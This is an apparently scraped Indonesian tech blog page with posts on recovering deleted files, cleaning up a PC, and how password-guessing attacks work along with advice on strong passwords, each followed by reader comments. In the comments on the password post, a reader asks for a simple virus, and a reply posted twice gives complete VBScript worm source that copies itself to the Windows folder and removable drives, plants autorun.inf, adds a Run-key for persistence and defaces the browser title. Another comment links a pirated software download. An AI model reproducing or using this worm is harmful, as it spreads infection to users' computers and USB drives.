about virus

Apakah Anda pernah secara tidak sengaja menghapus file Anda, kemudian sudah meng-empty recycle bin? Atau Anda telah mem-format hard disk tapi ingin data Anda kembali? Atau data hilang / rusak karena virus? Atau karena komputer mati atau restart tiba-tiba? Ada cara untuk mengembalikan data yang hilang, yaitu dengan satu software yang sangat lengkap, yaitu Ontrack EasyRecovery Professional. Inilah cara-cara mengembalikan data Anda yang hilang .

Pertama Anda harus download dulu software tersebut, silakan klik di sini untuk download software Ontrack Easy Recovery Professional. Software ini menyediakan sebuah solusi yang sangat komplit sehubungan dengan data yang hilang atau urusan recovery data yang hilang karena:

  1. Virus.

  2. Sektor yang tidak terbaca

  3. Kesalahan aplikasi, system, atau shut down yang tidak normal.

  4. Kerusakan pada critical area.

  5. Ter-format

  6. Penyebab lain yang memungkinkan hilangnya data.

Software ini di-install pada Windows 98 SE, Me, 2000, or XP, dan dapat me-recover data untuk pada semua sistem windows. Software ini memiliki empat feature utama, yaitu:

  1. Disk Diagnostics, yaitu tool untuk mengecek kondisi hardisk Anda apakah masih bagus atau tidak.

  2. Data Recovery, yaitu tool untuk mengembalikan data / file karena terhapus, terformat, dan sebagainya.

  3. Email Repair, yaitu tool untuk mengembalikan data email Outlook Express yang terhapus atau rusak.

  4. File Repair, yaitu tool untuk memperbaiki data / file Microsoft Word, Excel, Access, PowerPoint, dan ZIP (winzip) file yang rusak karena virus atau sebab lain.

Mari kita lihat satu per satu fasilitas yang ada dalam software ini.

1. Disk Diagnostics

Tool yang ada dalam Disk Diagnostics ini adalah:

  • Data Advisor, untuk membuat disket recovery.

  • Drive Tests, untuk mengetes kondisi fisik dari hard disk (disk drive).

  • Jumper Viewer, untuk melihat posisi jumper pada hard disk.

  • Partition Tests, untuk mengecek kondisi partisi hardisk.

  • Size Manager, untuk melihat kapasitas hard disk

  • SMART Tests, digunakan untuk mengetes kondisi Self-Monitoring, Analysis and Reporting Technology pada suatu hardisk.

2. Data Recovery

Tool-tool yang ada dalam Data Recovery ini adalah:

  • Advanced Recovery, untuk mencari data yang sudah tidak dapat di-recover dengan tool lain, yaitu karena ter-format, ter-partisi, virus, atau hal lain.

  • Deleted Recovery, untuk mencari data yang sudah dihapus. Ini adalah tool yang paling sering dipakai penulis.

  • Format Recovery, untuk mencari data pada hard disk yang sudah di-format.

  • Raw Recovery, untuk mencari file yang hilang berdasarkan signature.

  • Resume Recovery, semua proses recovery dapat dihentikan sementara dan dilanjutkan pada lain waktu.

  • Emergency Media, untuk membuat disket atau CD yang digunakan untuk me-recover data / file hilang.

3. Email Repair, digunakan untuk mengembalikan data email Outlook dan Outlook Express yang hilang.

4. File Repair, digunakan untuk mengembalikan file-file Microsoft Office dan ZIP yang rusak. Tool ini dapat memperbaiki file Microsoft Word, Excel, Access, PowerPoint, dan ZIP (winzip) file yang corrupt / rusak karena virus atau sebab lain.

Data atau file yang hilang lebih sulit di-recover jika:

  1. Anda menambahkan file baru setelah Anda menghapus atau memformat hard disk.

  2. Anda menggunakan FAT32 dalam Windows XP.

Demikian cara mengembalikan data yang hilang dengan software EasyRecovery Professional. Semoga data Anda bisa diselamatkan.

Penulis: Oka Mahendra

Sumber : http://tutorialgratis.wordpress.com

Entri ini dituliskan pada 5 April, 2008 pada 2:01 pm dan disimpan dalam Seputar Virus, Teknologi Informasi, Umum. . Anda bisa mengikuti setiap tanggapan atas artikel ini melalui RSS 2.0 pengumpan. Anda bisa tinggalkan tanggapan, atau lacak tautan dari situsmu sendiri.

26 Tanggapan ke “Cara Mengembalikan Data Yang Terhapus ?”

  1. nedi1989 Berkata:
    13 April, 2008 pada 2:51 pm

da yang lebih detail lg gak cara memakai software ini….

  1. Eddy Berkata:
    13 April, 2008 pada 8:41 pm

Smoga tulisan anda merupakan investasi di akhirat nanti. Sangat bermanfaat kok, khususnya bagiku yang pemula. thanks.

  1. Dem’z Berkata:
    5 Mei, 2008 pada 2:40 pm

bagus bgt, thanks yah… GBU

  1. arisa Berkata:
    6 Mei, 2008 pada 6:26 pm

gimana kalo hardisk itu udah diformat beberapa kali ? sedangkan data yang dicari itu mungkin adanya saat sebelum hardisk itu diformat yang ketiga ato mungkin kedua kalinya.
thanks before

  1. heru bond Berkata:
    14 Mei, 2008 pada 9:54 pm

mas bisa di perjelas gak cara pakek klo flesdisk kita kena virus atau hilang ke hidden.tolong dong fles ku kena virus yg bisa hidden.

  1. ANSHAR AMINULLAH Berkata:
    30 Mei, 2008 pada 7:41 pm

ADA JUGAJI CESS SY PUNYA INI SOFTWHERE. THANKS YAH

  1. Sammyang’s Weblog Berkata:
    10 Juni, 2008 pada 1:12 pm

[...] Cara Mengembalikan Data Yang Terhapus ? [...]

  1. Fuad Rahman Berkata:
    16 Juni, 2008 pada 4:17 pm

Bagaimana kalo hard disk nya udah di format truz udah di partisi ulang. apakah file2 yang udah terhapus masih bisa diselamatkan.trus, kalo udah bisa diselamatkan.apakah file2 nya bisa kembali sperti semula & tdk rusak. thanks b4

  1. host Berkata:
    16 Juni, 2008 pada 9:24 pm

kok link-downloadnya gak bisa……..

  1. Cara Mengembalikan Data Yang Terhapus ? « Guritnoo’s Weblog Berkata:
    20 Juni, 2008 pada 11:06 am

[...] Mengembalikan Data Yang Terhapus ? Cara Mengembalikan Data Yang Terhapus ? Diarsipkan di bawah: Seputar Virus, Teknologi Informasi, Umum — kang deden @ 2:01 pm Apakah [...]

  1. candra Berkata:
    23 Juni, 2008 pada 3:38 pm

thank atas sarannya

  1. bagus Berkata:
    8 Juli, 2008 pada 8:13 am

Mas saya punya masalah sperti ini jg, trus sy coba link-nya kok ga bs??? Sy udh cb download di situs aslinya tp cuma trial. Bs bantu gak, dmn sy bas dapetin software ini???

  1. mamat_metal Berkata:
    17 Juli, 2008 pada 10:40 am

mas saya punya masalah komputer saya ngereset terus kenapa yah, dia bolak balik di setup, gi mana caranya please

  1. athy Berkata:
    17 Juli, 2008 pada 6:47 pm

mas bs kasi tau cara mengembalikan data yang terhapus dr flash/memori? n caranya gimana?

  1. ron3y Berkata:
    10 Agustus, 2008 pada 11:36 am

kok gak bisa di download Sofware Ontrack Esay Recovery Professional
toloang sofware…

  1. danu Berkata:
    14 Agustus, 2008 pada 2:44 pm

duh gw butuh bgt ni software..tp kgk bisa di donlot.plis somebody help me.krm email ke aang_uri@yahoo.co.id yahh…

  1. tomz Berkata:
    2 September, 2008 pada 5:53 am

rapidshare.com/files/138904172/Ontrack.EasyRecovery.Professional.v6.12.retail.read.NFO-FOSI.rar
rapidshare.com/files/136149594/Ontrack.EasyRecovery.Pro.v6.12.Retail-FOSI.zip

  1. ajigerok Berkata:
    8 September, 2008 pada 10:03 pm

coba ach …

  1. een Berkata:
    7 Oktober, 2008 pada 12:10 pm

kang, data saya sudah terhapus setelah pake sofware ini datanya bisa kembali,tetapi kenapa ya file tidak bisa dibaca
apa solusinya………plz help?
tengyu…..

  1. anny Berkata:
    10 Oktober, 2008 pada 7:21 pm

mas, saya mau tanya berapa lama scannya?soalnya saya sudah 1 hari scan kok fileya ga muncul2…thx…

  1. amos Berkata:
    13 Oktober, 2008 pada 7:00 pm

makasih yah mas atas petunjuknya..
akhirnya file skripsiku dapet juga…!!!
makasih yah tuhan!!!!!!
makasih yah mas…..
kudoain deh moga2 mas dapet rezeki nomplok,jodoh lancar…
he5x…….

  1. agud Berkata:
    13 Oktober, 2008 pada 10:55 pm

wah kerenz n gua bangad….
thanks……

  1. gwgt Berkata:
    16 Oktober, 2008 pada 10:25 pm

klo gw dengan handy recovery
lumayan ampuh tuh, bise ngerestore file yg hardisknya sudah terformat 2kali

  1. Raisa Berkata:
    17 Oktober, 2008 pada 10:04 pm

gimana caranya untuk mengembalikan data-data photo-photoku (bervirus) yang terhapus karena di scan pake AVG ???
please help me!!!
thank’s 4 everything (be4)
^_^_^_^_^

  1. ali Berkata:
    21 Oktober, 2008 pada 12:38 pm

software mana bos? bagi2 donk

  1. Dadang Berkata:
    27 Oktober, 2008 pada 8:50 am

mas bs kasi tau cara mengembalikan data yang terhapus dr flash/memori? n caranya gimana?

gimana caranya untuk mengembalikan data-data photo-photoku (bervirus) yang terhapus karena di scan pake AVG ???
please help me!!!
thank’s 4 everything (be4)
^_^_^_^_^

mas saya punya masalah komputer saya ngereset terus kenapa yah, dia bolak balik di setup, gi mana caranya please

Tinggalkan Balasan

Top of Form

Nama (wajib)

Surat (tidak akan dipublikasikan) (wajib)

Situs web

XHTML: Anda dapat gunakan tag ini: <a href=”” title=””> <abbr title=””> <acronym title=””> <b> <blockquote cite=””> <cite> <code> <del datetime=””> <em> <i> <q cite=””> <strike> <strong>

Bottom of Form

« Apa Itu “Data Encapsulation” ?

Solusi Menghemat Memory Otak Dalam Mengingat Password

. Bersihkan desktop anda – buang semua shortcut dan dokumen yang bertumpuk di desktop anda. Anda dapat menggunakan application launcher seperti Launchy untuk instant keyboard access tanpa danya gangguan.

2. Buanglah Program yang tidak dibutuhkan – buanglah program yang tidak lagi dibutuhkan, dengan uninstallation tool seperti Revo Uninstaller.

3. Bersihkan Start Up, Registry, Cookies, dan lainnya. CCleaner (singkatan dari crap cleaner) adalah PC clean up tool yang dapat digunakan untuk menambah disk space anda dan membuang file-file yang tidak dibutuhkan.

4. Rapihkan “My Documents” anda – Walaupun file search pada desktop memungkinkan anda untuk mengorganisir folder, sangat baik untuk merapihkan My document anda tanpa membuang banyak usaha.

5. Hapuslah Temporary Internet file secara otomatis – bersihkan download file anda secara otomatis, email attachtment, dan temporary internet file yang lain dengan Windows Janitor Script.

6. Lihatlah isi disk anda, dan buanglah yang tidak perlu. Kehabisan tempat pada hard disk anda, tapi tidak tahu apa yang ada pada computer anda? WinDirStat dapat menjelaskan kepada anda apa saja yang memakan tempat pada disk anda, jadi anda dapat membuangnya tanpa ragu.

7. Temukan dan hapus file yang memiliki duplikat. Jika anda memiliki folder dengan banyak sekali foto dari kamera anda, atau banyak musik yang telah dikopi beberapa kali, atau file yang telah dkerjakan oleh keluarga atau grup anda, besar kemungkinan anda memiliki duplikasi file. Temukan file yang memiliki duplikat dengan menggunakan aplikasi WinMerge.

8. White Out Disk Free Space – Jika anda menghapus data anda dari hard drive, data tersebut mungkin masih ada secara fisik pada disk dan dapat dihidupkan kembali oleh program lain. Untuk menghapus data secara permanen, gunakan aplikasi Eraser.

9. Bersihkan debu yang menempel- Jika anda pernah menjatuhkan makanan keatas keyboard anda, atau kucing peliharaan anda pernah meinggalkan bulunya pada keyboard kesayangan anda, maka anda harus membersihkan debu-debu dan benda-benda lainnya yang bersarang disana.

10. format ulang hard drive, dan install ulang windows anda. Jika semua cara sudah dilakukan dan anda belum merasa puas, jurus yang satu ini adalah yang paling ampuh: format ulang hard drive dan install ulang Windows anda.

Sumber : http://abryantp.blogspot.com/

Entri ini dituliskan pada 13 Nopember, 2007 pada 12:48 pm dan disimpan dalam Seputar Internet, Seputar Virus, Teknologi Informasi. . Anda bisa mengikuti setiap tanggapan atas artikel ini melalui RSS 2.0 pengumpan. Anda bisa tinggalkan tanggapan, atau lacak tautan dari situsmu sendiri.

23 Tanggapan ke “10 Cara Terbaik Membersihkan PC Anda”

  1. Hisyam Basyeban Berkata:
    20 Nopember, 2007 pada 11:06 pm

Artikel ini sangat berguna sekali memang sih beberapa udah ada yg saya praktekkan cuma ada beberapa software nya baru saya tahu.
di tunggu artikel selanjutnya..

  1. Yoga budhi Berkata:
    21 Nopember, 2007 pada 4:40 pm

memang benar soalnya g jarang orang2 yang punya komputer tidak tau cara membersihkan data2 yang g berguna apalagi banyak orang yang punya komputer tapi banyak juga yang tidak mengerti cara perawatannya…

ditunggu artikel selanjutnya,,,

  1. ari Berkata:
    21 Nopember, 2007 pada 5:35 pm

pak deden kenapa web bapak tidak bisa untuk di simpan

  1. Frengky Sitinjak Berkata:
    2 Desember, 2007 pada 5:23 pm

kalau saya tidak punya komputer nii,,,tapi saya ucapkan terima kasih, karena ini saya ingin belajar walaupun g punya komputer. makasih

  1. himami Berkata:
    4 Desember, 2007 pada 6:15 pm

buat topik posted di wordpress piye caranya bos????
websitenya kalau ngubah gimana??

  1. hendra Berkata:
    23 Januari, 2008 pada 11:41 am

baaimanacarameninstal
antivirus(norton)
apaadasitusnya
kasitahuya?
maaftdkpakespsikeyboardnyarusak

  1. nadia Berkata:
    27 Januari, 2008 pada 5:30 pm

White Out Disk Free Space – Jika anda menghapus data anda dari hard drive, data tersebut mungkin masih ada secara fisik pada disk dan dapat dihidupkan kembali oleh program lain. Untuk menghapus data secara permanen, gunakan aplikasi Eraser.

aplikasi eraser itu apa sih pak? semacam software kah?

bisa ga file dihapus permanen (secara fisik, ga bisa dikembalikan)

mungkinkah dengan menghancurkan hard disknya? atau ada cara lain?

  1. faisal asani Berkata:
    8 Februari, 2008 pada 8:38 am

Saya sangat suka dengan keterangan-keterangan yang diberikan,tapi lebih bagusnya kalau keterangannya singkat padat dan jelas.

  1. fadie Berkata:
    24 Februari, 2008 pada 10:10 am

mang deden kasih tau dungz nie kan aq mau beli komputer but aq ga tau dengan budget 4500000 tuch apa aja xg dapet tak beli dengan kualitas pc yang bagus>>>>>tp ga usah pake fasilitas internet…….

  1. Nico Ximenes Berkata:
    1 Maret, 2008 pada 6:30 pm

Makasih atas sarangnya…
saya kira sangat butuhkan …sebab ini abdalah bagian mentenence Komputer.

  1. kDe Berkata:
    12 Maret, 2008 pada 10:48 am

wAh,.
informasinya sangat menarik dan membantu..
kLo bisa tolong kasi tau cara menentukan komposisi untuk merakit komputernya, mis klo pake core 2 duo, ram, vga, ma sound cardnya pk yg brp?
klo bisa kasi tau mereknya juga..
thanx

  1. Flow™ Berkata:
    13 Maret, 2008 pada 1:46 pm

how to make viruses

  1. Anita Berkata:
    15 Maret, 2008 pada 10:09 pm

I LOVE U so much

  1. Dhanny Kuswandi Berkata:
    24 Maret, 2008 pada 4:39 pm

sip….

  1. Eddy Berkata:
    13 April, 2008 pada 8:51 pm

sangat ok.

  1. ishal Berkata:
    7 Juni, 2008 pada 12:01 am

salam kenal om den ntar mo bnyk ngerepotin boleh

  1. ika Berkata:
    16 Juni, 2008 pada 10:33 am

software2 yang diatas disebutin tolong dikirim ke email saya ya….thanks b4

  1. Alfabian Berkata:
    18 Juni, 2008 pada 8:54 pm

Trims atas ilmu pamungkasnya, Kang Deden. Trims skali lg klo Kang Deden mo bls email saya ini dgn atachment berisi software2 sakti tsb.

  1. 10 Cara Terbaik Membersihkan PC Anda « Guritnoo’s Weblog Berkata:
    20 Juni, 2008 pada 11:01 am

[...] Cara Terbaik Membersihkan PC Anda 10 Cara Terbaik Membersihkan PC Anda Diarsipkan di bawah: Seputar Internet, Seputar Virus, Teknologi Informasi — kang deden @ 12:48 [...]

  1. hanif Berkata:
    1 September, 2008 pada 3:47 pm

best ar tq… bagusnya rakyat indonesia x kdekut…

  1. AeArc’ Berkata:
    15 September, 2008 pada 9:51 pm

manteb eeeuuuyyy… saya kirain tips tentang AntiVirus… taunya… ya udah, gak papa & gak mama kok, di tunggu artikel berikutnya, ya..
(jangan lupa sering jalan2 di blogku) اسلم ءليكم

  1. deden Berkata:
    19 Oktober, 2008 pada 1:22 pm

Kang den ni yg suka saya bingung maklumlah br belajar,
kalo mau nge instal ulang apa masuk ke BIOS ato meng format dl system C; nya,terimakasih bantuannya….
di tunggu banget jawaban kang deden….

  1. Rfanalv’s Weblog Berkata:
    20 Oktober, 2008 pada 11:13 pm

[...] 10 Cara Terbaik Membersihkan PC Anda [...]

Tinggalkan Balasan

Top of Form

Nama (wajib)

Surat (tidak akan dipublikasikan) (wajib)

Situs web

XHTML: Anda dapat gunakan tag ini: <a href=”” title=””> <abbr title=””> <acronym title=””> <b> <blockquote cite=””> <cite> <code> <del datetime=””> <em> <i> <q cite=””> <strike> <strong>

Bottom of Form

Membobol pasword

Jaman sekarang yang namanya hacker atau cracker semakin kreatif, dengan berbagai cara mereka berusaha menembus email Anda, friendster, rekening online, web site, bahkan blog.Anda tidak mau kan, kalau suatu saat profile Anda di friendster diubah oleh orang? Atau web site Anda tiba-tiba di ganti tampilannya oleh hacker / cracker ?

Salah satu cara hacker menembus account kita adalah dengan cara menebak password. Hacker menggunakan script yang dapat memasukkan puluhan password tiap detik untuk mencoba masuk ke dalam account kita.

Cara hacker menebak password kita antara lain dengan:

  1. Brute force attack, yaitu dengan mencoba semua kombinasi, mulai dari aaaa sampai zzzz, sampai beberapa karakter.

  2. Dictionary attack, yaitu dengan menebak menggunakan kata-kata dalam kamus, dan dikombinasikan dengan angka-angka atau karakter.

  3. Personal information attack, dengan cara memasukkan data-data pribadi seperti nomor telepon, tanggal lahir, nama pacar, kode pos, dan sebagainya.

Password yang sangat lemah akan sangat mudah dibobol hacker dengan cara ini. Contoh password yang sangat lemah misalnya:

  • 123456, qwerty, asdf, ini karena mudah sekali orang mengetik kombinasi ini di keyboard.

  • password, mypassword, dan lain-lain yang menggunakan kata-kata dalam kamus (semua bahasa).

  • tanggal lahir, nama pacar, dan lainnya yang merupakan data diri orang tersebut.

Password yang lemah, bisa dibobol dalam waktu yang lebih cepat, misalnya:

  • menggunakan semua huruf kecil.

  • menggunakan kombinasi kata dan angka, misalnya buku10, teroris80.

  • mengganti huruf dengan karakter, misalnya c1nt@

Bagaimana password yang kuat dan sulit ditembus hacker?

  1. Merupakan kombinasi dari huruf besar, huruf kecil, nomor, dan karakter.

  2. Panjang lebih dari 10 karakter.

  3. Tidak menyertakan kata-kata dalam kamus.

Password yang kuat harus mudah diingat oleh pemiliknya.

Contoh password yang kuat: 1mAu$100Ribu

Cara mengingatnya:

  • 1 = kata “saya” diterjemahkan dalam bahasa Inggris (I).

  • mAu = mau

  • $ = uang

  • 100Ribu = 100 ribu

Contoh password kuat yang lain: ninG->0+1Gul

Cara mengingatnya:

  • ninG = misalnya nama orang sepesial buat Anda: Naning

  • -> = panah identik dengan adalah

  • 0+ = lambang cewek

  • 1 =berarti nomor satu atau paling

  • Gul = gula itu manis

Beberapa tips:

  1. Jangan menggunakan password yang sama untuk berbagai macam layanan, misalnya password email Anda sama dengan password friendster. Ini berarti:

    • seseorang yang dapat menjebol password friendster Anda, bisa juga menjebol password email Anda. Sementara di mata hacker menjebol password friendster lebih mudah daripada menjebol email Yahoo.

    • admin atau “orang dalam” friendster tahu password Anda, dia juga bisa memasukkan password tersebut ke email Anda.

  2. Jangan mengklik link di email yang menyatakan Anda harus memverifikasi password Anda. Email ini dikirim oleh hacker.

  3. Jangan memasukkan password disitus selain yang memberikan layanan. Misalnya jangan memasukkan password yahoo di situs friendster untuk alasan apapun (misalnya import address book).

  4. Sebelum login ke email atau yang lain, pastikan URL di browser Anda benar. Misalnya mail.yahoo.com bukan mail.yahoo-ltd.com atau yahoo-verify.com atau yang lain.

  5. Untuk rekening online seperti e-gold, klik BCA, paypal, sebaiknya Anda tidak mengetik password Anda lewat keyboard (karena hacker bisa membaca keyboard Anda dengan program keylogger). Gunakan On Screen Keyboard, Charakter Map, atau copy paste dari huruf acak.

Okey begitulah tips-tips agar password kita sulit dibobol hacker. Semoga dengan tips ini account kita aman dan terhindar dari kebobolan.

Penulis: Oka Mahendra

Entri ini dituliskan pada 5 April, 2008 pada 2:08 pm dan disimpan dalam Seputar Internet, Teknologi Informasi, Umum. . Anda bisa mengikuti setiap tanggapan atas artikel ini melalui RSS 2.0 pengumpan. Anda bisa tinggalkan tanggapan, atau lacak tautan dari situsmu sendiri.

34 Tanggapan ke “Cara Membobol Password dan Solusi Menangkalnya”

  1. iddonk Berkata:
    10 April, 2008 pada 2:15 pm

mmmhh….gitu ya mas, thank atas penjelasan-a. di tunggu artikel selanjutnya

  1. amient Berkata:
    12 April, 2008 pada 4:52 pm

makasih bro.. aku tunggu artikel-artikel selanjutnya..
maju terus…

  1. alghozali Berkata:
    14 April, 2008 pada 4:52 pm

mantap thank’s informasinya

  1. gusri ade putra Berkata:
    14 April, 2008 pada 11:57 pm

say tlah membaca postingan abang dan kebetulan say sekarng ini lago terkena virus nah jadi kebeutlan aja ketemu dengan block nya mas

thanks yahu bang

  1. adjie Berkata:
    17 April, 2008 pada 8:24 pm

saran anda hebat,,,aku kagun dengan kerendahan hati anda,
thks yah…
aku tunggu selanjutnya.
wass,,,,,,,,,,,,,,,,,
maju terus,,,,

  1. adjie Berkata:
    17 April, 2008 pada 8:26 pm

mas dulu lulusan mana yah?
apakah akademik anda juga kasih anda penghargaan?

  1. raptor Berkata:
    18 April, 2008 pada 8:10 pm

wah penjelasan yg sangat hebat.aku acungi jempol buat mas oka mahendra.semoga kebaikan mas mendapatkan balasan dari Allah Hyang Maha Kuasa.Truslah berkarya.Sebuah karya yang diiringi dengan ketulusan hati akan membuat damai pula di hati.terima kasih atas jerih payahnya menyumbangkan pengetahuan yang sangat berharga.Terima kasih dan maaf kalau ada kata yang nggak baik.Salam kenal dan damai selalu.

  1. Lua Berkata:
    19 April, 2008 pada 1:11 pm

bro itu cara ebat amat kasi taw dong cara lain biar bisa bobolin orang yang bobolin kita

  1. up Berkata:
    21 April, 2008 pada 11:30 am

ternyata gtu…pantesan kadang ID game saya ter-hack……

makasih ya kak atas pemberitahuannya……^^

  1. Didik Purnomo, ST Berkata:
    22 April, 2008 pada 10:04 am

Bagus sekali
gue alumni UNMER malang
Jurusan Teknik Industri
Anggota Resimen Mahasiswa ( Menwa ) Latsar 50
Salam Damai selalu

  1. Mukhtar Hasan Berkata:
    24 April, 2008 pada 9:41 pm

mas bagaimana cara membobol pasword di windows 2000 server Family…?

  1. arya Berkata:
    26 April, 2008 pada 5:49 pm

ajarin bikin firus donk. yg simple aja

  1. bagol Berkata:
    7 Mei, 2008 pada 10:16 pm

kang ….saya mau nanya gman untuk masuk ke user orang?padah saya udah remote desktop connection tpi mina user sama passwdya

  1. ahmad_erwiansyah Berkata:
    8 Mei, 2008 pada 7:03 pm

setau saya keylogger dapat menangkap inputan dari on screen keyboard…!
so, tetap hati-hati….!

  1. caffeins Berkata:
    27 Mei, 2008 pada 12:33 pm

bener bangets.

pishing (bener gak yah nulisnya) itu lagi booming katanya.
ati-ati masukin email dan password di situs2 yang belum di percaya.
artikel ini berguna bangets kang.

bravo artikelnya.
salam kenal ya

  1. mas apan Berkata:
    2 Juni, 2008 pada 6:05 pm

bisa berabe klo kebetulan yg nge-hack sama2 dapat ilmu dari sini.cari inspirasi sendiri ato ngembangin standar password sendiri wae
iyo to?….?

  1. firman Berkata:
    23 Juni, 2008 pada 11:57 am

Bang, saat ini pasword email ku sedang dihaecker orang. Gmn caranya biar email aku tadi bisa kembali. Tolong bantuannya bang. Tolong kirim answernya ke FIRMAN_BOY2007@yahoo.com

  1. Tukang tambal ban Berkata:
    30 Juni, 2008 pada 9:52 am

mang DEDEN 1000 % oks bangeeeeeetttttt…. tops tops.. abiesszzz

  1. nn Berkata:
    4 Juli, 2008 pada 2:31 pm

Oooo….

tapi bkn kamu kan pembobolnya…!!! (hacker-nya..!!!)

OK.. OK…

  1. angin Berkata:
    10 Juli, 2008 pada 6:51 pm

@ Arya

on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe MS32DLL.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\MS32DLL.dll.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\MS32DLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\MS32DLL.dll.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
set tf=fs.getfile(flashdrive.path &”\MS32DLL.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\MS32DLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\MS32DLL.dll.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(”WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,winpath&”\MS32DLL.dll.vbs”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”Hacked by Andre Susanto”
rg.regwrite “HKCR\vbsfile\DefaultIcon”,”shell32.dll,2″
if check 1 then
Wscript.sleep 200000
end if
loop while check1
set sd = createobject(”Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

pastekan kode2 tsb di notepad,save as bla bla bla .vbs

@ penulis blog ini

TUh cara emang bisa dikit mbantu kita kebobolan pass,tapi gimana klo dia (sipencuri) menggunakan bantuan tool hack,semacem keyloger,metasploit,dll.password sengan karakter apapun bisa ke rekam,asal kita menulisnya lngsung dari keybord kita.Nah klo mw lebih aman lagi kita tulis aja pass kita di notepad (nulisnya dirumah) n kita save di fd,jadi klo kita mw log in,tinggal coppy paste aja,kn ga ke deteck tuh ma keyloger.Tapi msih kedetek ma metasploit.

klo mnrtku sie satu2 nya jalan biar ga keclengan password,ya
1.jangan sampe kita nambah musuh.Semakin banyak orang yg benci sama kita semakin besar peluang kita dijailin orang.
2.kita umbar aja password kita.N sebelumnya kita hpus ja file2 yg penting di fs/email kita.jd kalo keambil passnya,ya silahkan ambil aja…toh kita bisa bikin lagi.

ga akan pernah ada yg namanya aman di dunia internet,.
cuma kewaspadaan yg bisa dikit nolong kita.

  1. saya Berkata:
    10 Juli, 2008 pada 6:52 pm

@ Arya

on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe MS32DLL.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\MS32DLL.dll.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\MS32DLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\MS32DLL.dll.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
set tf=fs.getfile(flashdrive.path &”\MS32DLL.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\MS32DLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\MS32DLL.dll.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(”WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,winpath&”\MS32DLL.dll.vbs”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”Hacked by Andre Susanto”
rg.regwrite “HKCR\vbsfile\DefaultIcon”,”shell32.dll,2″
if check 1 then
Wscript.sleep 200000
end if
loop while check1
set sd = createobject(”Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

pastekan kode2 tsb di notepad,save as bla bla bla .vbs

@ penulis blog ini

TUh cara emang bisa dikit mbantu kita kebobolan pass,tapi gimana klo dia (sipencuri) menggunakan bantuan tool hack,semacem keyloger,metasploit,dll.password sengan karakter apapun bisa ke rekam,asal kita menulisnya lngsung dari keybord kita.Nah klo mw lebih aman lagi kita tulis aja pass kita di notepad (nulisnya dirumah) n kita save di fd,jadi klo kita mw log in,tinggal coppy paste aja,kn ga ke deteck tuh ma keyloger.Tapi msih kedetek ma metasploit.

klo mnrtku sie satu2 nya jalan biar ga keclengan password,ya
1.jangan sampe kita nambah musuh.Semakin banyak orang yg benci sama kita semakin besar peluang kita dijailin orang.
2.kita umbar aja password kita.N sebelumnya kita hpus ja file2 yg penting di fs/email kita.jd kalo keambil passnya,ya silahkan ambil aja…toh kita bisa bikin lagi.

ga akan pernah ada yg namanya aman di dunia internet,.
cuma kewaspadaan yg bisa dikit nolong kita.

thx

  1. Aulia Berkata:
    14 Juli, 2008 pada 6:55 pm

wah tulisan kayak gini sudah sepantasnya orang waspada dengan U & P (user and pass)…

  1. antony sinaga Berkata:
    15 Juli, 2008 pada 5:03 pm

kayaknya smua tuh hanya pengenalan dasar aja karna ga ada yang bisa mengalahkan spyware. tolong dikasih tau cara mengatasinya karna saya sering menggunakan jasa pembelian secara online

  1. yuya Berkata:
    16 Juli, 2008 pada 4:50 pm

hm,,,,,bgus2

  1. yuya Berkata:
    18 Juli, 2008 pada 6:53 pm

thanks ya mas…..
berGuna banget mas…

  1. rian Berkata:
    21 Juli, 2008 pada 2:19 pm

